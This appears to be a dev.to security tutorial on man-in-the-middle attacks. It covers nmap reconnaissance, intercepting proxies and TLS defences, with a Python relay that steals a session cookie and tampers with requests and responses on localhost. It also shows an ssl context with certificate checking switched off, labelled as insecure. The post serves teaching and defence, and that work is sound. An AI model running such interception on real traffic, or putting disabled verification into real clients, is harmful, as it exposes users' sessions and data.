
Someone is watching you over the Internet. Protect and Fight Back - Man in the Middle

Rémi Lavedrine ・ 8 min read



In this article, I will explain how anyone sitting on the path of your traffic, on your local network or on a router at the other end of the world, can read what you send over the Internet when it is not encrypted.

I know it is a long post, but I tried to make it as enjoyable and understandable as I could, because this is one of the most common means of attack. Read it to the end: understanding one of the methods attackers use most often to compromise an application will go a long way towards improving the security of your code and of your organisation.

If you prefer to see it on a video, you can find it on my Twitch channel.


I am streaming every Thursday at 9:00pm (GMT+1) on my Twitch channel about security topics. 🖥️

Feel free to come and say hello 🙋🏼‍♂️ if that is of any interest to you, if reading this article raised questions you desperately need answered 🤔, or to watch the previous topics I have covered over the weeks. 🗓

The stream about Man in the Middle attacks is available here.

Here is a clip about it on Twitter:


Introduction

The Internet, as a network, can be thought of as a spider web; that is why we so often call it "the web".
There is no direct line from one client to one server: your packets are handed from router to router until they reach their destination.
To see how many hops your data takes, you can use a traceroute tool, either locally or through one of the online services that run it for you.


Tools to Gather Information over the Network

Online services such as Network-Tools.com will show you how many hops there are between your router and dev.to.

Here I used traceroute6 from a Linux terminal instead (install it with sudo apt-get install traceroute):

traceroute6 -n www.dev.to
traceroute to www.dev.to (2606:4700:3034::6818:6d3d) from 2a01:cb08:614:b300:5c9:522:7a8:19b4, 30 hops max, 24 byte packets
 1  2a02:cd09:614:b400:924d:4aff:fde8:fca0  2,905 ms  2,764 ms  2,702 ms
 2  2a02:cd09:a004:204:153:253:77:4  4,373 ms  3,799 ms  3,955 ms
 3  2a02:cgc6:0:505::b  5,089 ms  4,529 ms  4,733 ms
 4  * * *
 5  2001:688:0:2:1::28  6,635 ms  4,792 ms  4,947 ms
 6  2001:688:0:3:8::21c  28,701 ms  8,002 ms  8,377 ms
 7  2400:cb00:19:1024::6ca2:e429  5,845 ms  5,732 ms  5,688 ms

As you can see in that output, there is more than one hop between your router and the website: 7 hops here (hop 4 did not answer at all, hence the * * *).
You do not know who owns each of the intermediate routers, and any of them could be operated, or compromised, by someone who wants to snoop on your communications.
If your communications are not encrypted with "https" (TLS), everything you send and receive is readable by anyone in the middle, that is, on any device that forwards your packets.

Reading traffic at such a hop is eavesdropping; when the attacker also relays the traffic and is able to alter it, that is what is called a Man in the Middle attack.

A picture is worth a thousand words, so let's explain this through a picture.
Sniffing over a Network Communication

That is why it is so important to understand that, as soon as you are not encrypting your communications using "https", anyone in the middle can listen to them.


What are the tools that can do Man in the Middle?

With nmap, you can discover which servers or machines are on the network, which ports are open, which Operating System is running on those machines and a lot of other information that is very valuable to an attacker.
Nmap is definitely a tool you have to know, and know how to use, if you want to assess the security of your network. That way you will know whether your network is at risk: which ports are open on your machines, and are they open on purpose?

  • If not, be sure to close them.
  • If they are, be sure to put strong authentication in front of them (public-key or certificate-based authentication on SSH port 22, for example, rather than passwords).

Here is the result of a scan on "scanme.nmap.org", a host the Nmap project explicitly invites you to scan:

nmap -A scanme.nmap.org 

Starting Nmap 7.60 ( https://nmap.org ) at 2020-05-22 15:45 CEST
Nmap scan report for scanme.nmap.org (45.33.32.156)
Host is up (0.17s latency).
Other addresses for scanme.nmap.org (not scanned): 2600:3c01::f03c:91ff:fe18:bb2f
Not shown: 991 closed ports
PORT      STATE    SERVICE      VERSION
22/tcp    open     ssh          OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 ac:00:a0:1a:82:ff:cc:55:99:dc:67:2b:34:97:6b:75 (DSA)
|   2048 20:3d:2d:44:62:2a:b0:5a:9d:b5:b3:05:14:c2:a6:b2 (RSA)
|   256 96:02:bb:5e:57:54:1c:4e:45:2f:56:4c:4a:24:b2:57 (ECDSA)
|_  256 33:fa:91:0f:e0:e1:7b:1f:6d:05:a2:b0:f1:54:41:56 (EdDSA)
25/tcp    filtered smtp
80/tcp    open     http         Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Go ahead and ScanMe!
139/tcp   filtered netbios-ssn
179/tcp   filtered bgp
445/tcp   filtered microsoft-ds
8045/tcp  filtered unknown
9929/tcp  open     nping-echo   Nping echo
31337/tcp open     tcpwrapped
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 82.91 seconds

nmap has a lot of features; you should explore the nmap documentation to learn more about it. It can take a long time to really master Nmap, but it is definitely worth it.
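The practical question behind the list above (are these ports open on purpose?) is easy to automate once you have a scan. The following is an added example, not code from the original post: a small Python parser for nmap's normal output, fed with a constructed excerpt of the scanme.nmap.org scan above, that lists the open ports and flags any that are not in an allowlist of what the host is supposed to expose. The allowlist values are assumptions for the demonstration.

```python
import re
from typing import List, NamedTuple, Set, Tuple

# Constructed sample: port lines from the scanme.nmap.org scan shown above,
# in nmap's "normal" output format (abridged).
SAMPLE_SCAN = """\
Nmap scan report for scanme.nmap.org (45.33.32.156)
Host is up (0.17s latency).
Not shown: 991 closed ports
PORT      STATE    SERVICE      VERSION
22/tcp    open     ssh          OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 20:3d:2d:44:62:2a:b0:5a:9d:b5:b3:05:14:c2:a6:b2 (RSA)
25/tcp    filtered smtp
80/tcp    open     http         Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Go ahead and ScanMe!
445/tcp   filtered microsoft-ds
9929/tcp  open     nping-echo   Nping echo
31337/tcp open     tcpwrapped
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
"""


class Port(NamedTuple):
    number: int
    proto: str
    state: str
    service: str
    version: str


# One nmap port line: "<port>/<proto>  <state>  <service>  [<version banner>]"
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp|sctp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")


def parse_nmap(text: str) -> List[Port]:
    """Extract the port table from nmap normal output, ignoring NSE script lines ("| ...")."""
    ports = []
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if m:
            ports.append(Port(int(m.group(1)), m.group(2), m.group(3),
                              m.group(4), (m.group(5) or "").strip()))
    return ports


def open_ports(ports: List[Port]) -> List[Port]:
    """Only the ports nmap reports as open (filtered ones did not answer at all)."""
    return [p for p in ports if p.state == "open"]


def unexpected_open_ports(ports: List[Port], allowed: Set[Tuple[int, str]]) -> List[Port]:
    """Open ports that are not in the allowlist of (port, proto) this host is meant to expose."""
    return [p for p in open_ports(ports) if (p.number, p.proto) not in allowed]


if __name__ == "__main__":
    found = parse_nmap(SAMPLE_SCAN)
    # Assumed policy for the demo: this host should only expose SSH and HTTP.
    for p in unexpected_open_ports(found, {(22, "tcp"), (80, "tcp")}):
        print(f"unexpected: {p.number}/{p.proto} {p.service} {p.version}")
```

Against a real host, save the scan with nmap -sV -oN scan.txt <host>, pass the file contents to parse_nmap and run it from a scheduled job on your own machines: the output of unexpected_open_ports is your exposure drift report.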

You could then automate it to scan random IP addresses on the Internet and discover unprotected machines. Be aware that scanning hosts you do not own or have written permission to test is illegal in most jurisdictions, which is exactly why scanme.nmap.org exists.
If you are thinking of building something like this anyway, a service already does it: Shodan.io.

Now that we are done with the reconnaissance phase, let's get "in the Middle". ;-)


Tools to Listen to a Communication over a Network

As we talked about OWASP in a previous article, you may have heard about OWASP ZAP.

You can use Burp Suite as well.

Charles Proxy, for fellow macOS users.

Or Bettercap, if you love the command line and the possibilities it offers to script it.

With all these tools you can listen to the network and perform Man in the Middle attacks. Note the difference between them: ZAP, Burp and Charles are intercepting proxies, so the client (your browser) has to be configured to send its traffic through them, and to trust their CA certificate if you want to see inside HTTPS; Bettercap works at the network level (ARP or DNS spoofing) to put itself in the path of a victim that has configured nothing.
Start with your own computer to learn how to use these tools.

The PortSwigger Web Security Academy labs are a perfect place to start learning how to use Burp:
Web Security Academy: Free Online Training from PortSwigger

Any network-related CTF is a perfect candidate as well to train your skills with these tools.
I use Root Me very frequently and recommend this platform to train and learn. Hack The Box is a really good platform to learn and train as well.

Use the tool that suits you best. Every one of them is a really good one.


What is a Man in the Middle Attack

A Man in the Middle attack consists of placing yourself between two machines on the network so that their traffic goes through you.
You can simply listen and forward the traffic unchanged, in order to gather information (credentials, session cookies, the content of requests and responses).

Or you can modify the traffic from the client to the server, or from the server to the client, without either of them noticing that what they receive is not what was sent.
That is very useful to extract interesting information from a user, or to attack the user directly (injecting content into the responses the browser renders, for example).

Here is a picture that describes a Man in the Middle in a very simple way.
Sniffing over a Network Communication


Perform a Man in the Middle Attack

I chose a challenge on the Root-me website to illustrate how you can get yourself in the middle of a communication with these tools and then modify the content.
On Firefox, you just have to install a proxy-switching add-on that redirects the browser's traffic to your tool (I am using Burp Suite in the video); for HTTPS sites you also have to import the tool's CA certificate into the browser, otherwise Firefox will, rightly, refuse the proxy's forged certificates.

As you can see in the video, it is pretty easy to change anything in the request, from headers to content to the HTTP verb, etc.
That gives you a lot of latitude in the kind of attack you want to perform.

You can then automate it for testing purposes on your application, server, or whatever else, to be sure it stays secure.
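To make the two modes described above concrete (listen and forward, or modify on the way), here is an added example that is not part of the original post or of the Root-me challenge: a minimal TCP relay in Python, run entirely on localhost, playing the attacker between a victim client and a toy HTTP origin. The host name, cookie and paths in the sample request are constructed. The relay assumes the victim's traffic already reaches it (a proxy setting, as with the Firefox add-on, or ARP spoofing with a tool like Bettercap); steering the traffic is not part of this code.

```python
import re
import socket
import threading

# Constructed sample: a plain-HTTP request a browser would send to a site that is
# not using TLS. The host, path and cookie value are made up for the demo.
CLIENT_REQUEST = (
    b"GET /account HTTP/1.1\r\n"
    b"Host: bank.example\r\n"
    b"Cookie: session=abc123\r\n"
    b"\r\n"
)


def recv_all(sock) -> bytes:
    """Read until the peer half-closes; every sender in this demo signals 'done' with SHUT_WR."""
    chunks = []
    while True:
        data = sock.recv(4096)
        if not data:
            return b"".join(chunks)
        chunks.append(data)


def start_listener(handler) -> int:
    """Serve exactly one connection on an ephemeral localhost port; return that port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    port = srv.getsockname()[1]

    def run():
        conn, _ = srv.accept()
        with conn:
            handler(conn)
        srv.close()

    threading.Thread(target=run, daemon=True).start()
    return port


def origin_handler(conn):
    """The legitimate server: a minimal HTTP responder that echoes the requested path."""
    request = recv_all(conn)
    path = request.split(b" ", 2)[1]
    body = b"You asked for " + path
    conn.sendall(b"HTTP/1.1 200 OK\r\nContent-Length: %d\r\n\r\n%s" % (len(body), body))


def make_mitm_handler(origin_port: int, captured: dict):
    """The attacker's relay, sitting between the victim and origin_port."""
    def handler(client_conn):
        request = recv_all(client_conn)
        # 1. Passive: copy whatever is valuable, here the session cookie.
        for line in request.split(b"\r\n"):
            if line.lower().startswith(b"cookie:"):
                captured["cookie"] = line.split(b":", 1)[1].strip()
        # 2. Active, client -> server: rewrite the request before forwarding it.
        request = request.replace(b"GET /account ", b"GET /admin ", 1)
        with socket.create_connection(("127.0.0.1", origin_port)) as upstream:
            upstream.sendall(request)
            upstream.shutdown(socket.SHUT_WR)
            response = recv_all(upstream)
        # 3. Active, server -> client: tamper with the response, keeping the HTTP framing valid.
        head, body = response.split(b"\r\n\r\n", 1)
        body += b" (injected by the relay)"
        head = re.sub(rb"Content-Length: \d+", b"Content-Length: %d" % len(body), head)
        client_conn.sendall(head + b"\r\n\r\n" + body)
    return handler


def browse(port: int, request: bytes) -> bytes:
    """The victim's client: send one request, read one response."""
    with socket.create_connection(("127.0.0.1", port)) as s:
        s.sendall(request)
        s.shutdown(socket.SHUT_WR)
        return recv_all(s)


def run_demo():
    """Wire victim -> relay -> origin on localhost; return what the relay stole and what the victim saw."""
    captured = {}
    origin_port = start_listener(origin_handler)
    relay_port = start_listener(make_mitm_handler(origin_port, captured))
    response = browse(relay_port, CLIENT_REQUEST)
    return captured, response


if __name__ == "__main__":
    stolen, seen = run_demo()
    print("relay captured:", stolen)
    print("victim received:", seen.decode())
```

Run it and you get the stolen cookie on one line and, on the other, a response for /admin containing text the origin never sent. Nothing in plain HTTP lets either end detect this; with TLS the relay would have to present a certificate for bank.example that the client refuses to trust, which is the whole point of the next section.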


Protect from MitM Attacks

There are countless ways to stay secure from MitM attacks, or at least to make it really complicated for an attacker to pull one off successfully.
First, be sure to implement "https" (TLS) on your website, so that your traffic is encrypted and someone sniffing the network cannot read it, or alter it without you noticing. Serve every page over HTTPS, not only the login form, and send an HSTS header so that browsers stop sending that first request in plain text, which is exactly what a stripping attack preys on.
If you are implementing a server, you should use a certificate issued by a trusted Certificate Authority, so that the client can check that the traffic it receives really comes from your server and not from an impostor.
Indeed, modern browsers pop up a warning to users if the certificate is not signed by a trusted entity or does not match the host name. Do not teach your users to click through that warning: that is precisely what an attacker holding a forged certificate needs them to do.

Then, if you really want to be sure that your traffic is safe and you control both client and server, you can use mutual authentication (mutual TLS): each side presents its own certificate and checks the other's against the CA it expects (or against a pinned certificate), rejecting the connection, and obviously alerting your monitoring, if the peer's certificate is not the one expected. Note that TLS already encrypts and authenticates the traffic; what mutual TLS adds is that the server authenticates the client too, so a stolen URL or password is not enough to talk to it.
It is a little overkill for a public website, but for specific data, or for service-to-service traffic, it is worth it.
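The protections above are only as good as the client's verification settings, which is where many "https" deployments get silently broken. The following is an added example, not code from the original post: Python ssl contexts showing the weak setting beside the corrected one, a mutual TLS server context, and an audit function you can point at any context in a code base. The file paths passed to mtls_server_context are assumptions (no certificates ship with this example).

```python
import ssl
from typing import List, Optional


def insecure_client_context() -> ssl.SSLContext:
    """The shortcut that quietly enables MitM: accept any certificate for any name.
    This is what 'verify=False'-style settings do under the hood."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False      # must be disabled before verify_mode can be relaxed
    ctx.verify_mode = ssl.CERT_NONE
    return ctx


def hardened_client_context(ca_bundle: Optional[str] = None) -> ssl.SSLContext:
    """Verify the server chain (system CAs, or a private CA you pin to via ca_bundle,
    an assumed path) and the host name, and refuse TLS versions older than 1.2."""
    ctx = ssl.create_default_context(cafile=ca_bundle)   # CERT_REQUIRED + check_hostname
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    return ctx


def mtls_server_context(cert_file: str, key_file: str, client_ca_file: str) -> ssl.SSLContext:
    """Mutual TLS on the server side: present our own certificate and require every
    client to present one signed by the CA in client_ca_file. All three paths are assumptions."""
    ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH, cafile=client_ca_file)
    ctx.load_cert_chain(cert_file, key_file)
    ctx.verify_mode = ssl.CERT_REQUIRED   # CLIENT_AUTH contexts default to CERT_NONE
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    return ctx


def audit_context(ctx: ssl.SSLContext, role: str = "client") -> List[str]:
    """Findings a code review (or a CI check) would raise about a context."""
    findings = []
    if ctx.verify_mode != ssl.CERT_REQUIRED:
        findings.append("peer certificate not required: any MitM certificate is accepted")
    if role == "client" and not ctx.check_hostname:
        findings.append("host name not checked: a valid certificate for another site is accepted")
    if ctx.minimum_version < ssl.TLSVersion.TLSv1_2:
        findings.append("TLS older than 1.2 allowed")
    return findings


if __name__ == "__main__":
    print("insecure:", audit_context(insecure_client_context()))
    print("hardened:", audit_context(hardened_client_context()))
```

Pass hardened_client_context() to http.client, urllib or any library that accepts an SSLContext, and grep your code base for CERT_NONE and check_hostname = False: those two lines are what turn a browser-grade client into one that any relay can impersonate.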


Conclusion

Man in the Middle attacks, and how to stay unnoticed on a network, are basics for a pentester, and as a security engineer you must know how they work so that you understand which countermeasures to put in place to stay secure from this kind of attack.
Once you have understood that an attacker can sit in the middle and edit any field of any request, you also understand why you should never trust user input, even input your own client-side code produced or validated, and always check it on the server against the data you actually hold there.


Thank you so much for reading it to this point.
I hope you enjoyed reading it and learned something.

Leave me a message if CTF is already something that you are doing.
Tell me what you think about these kind attacks and these tools. Are you using other tools to listen to the network ?
I’ll be happy to see that I helped add security to an organisation, or that someone discovered something new reading this article and is going to upgrade their security game. 💪

That would mean a lot to me.

Rémi Lavedrine (@shostarsson): Software Dev turned Security Dev. Follow me on dev.to, twitch.tv/shostarsson or youtube.com/shostarsson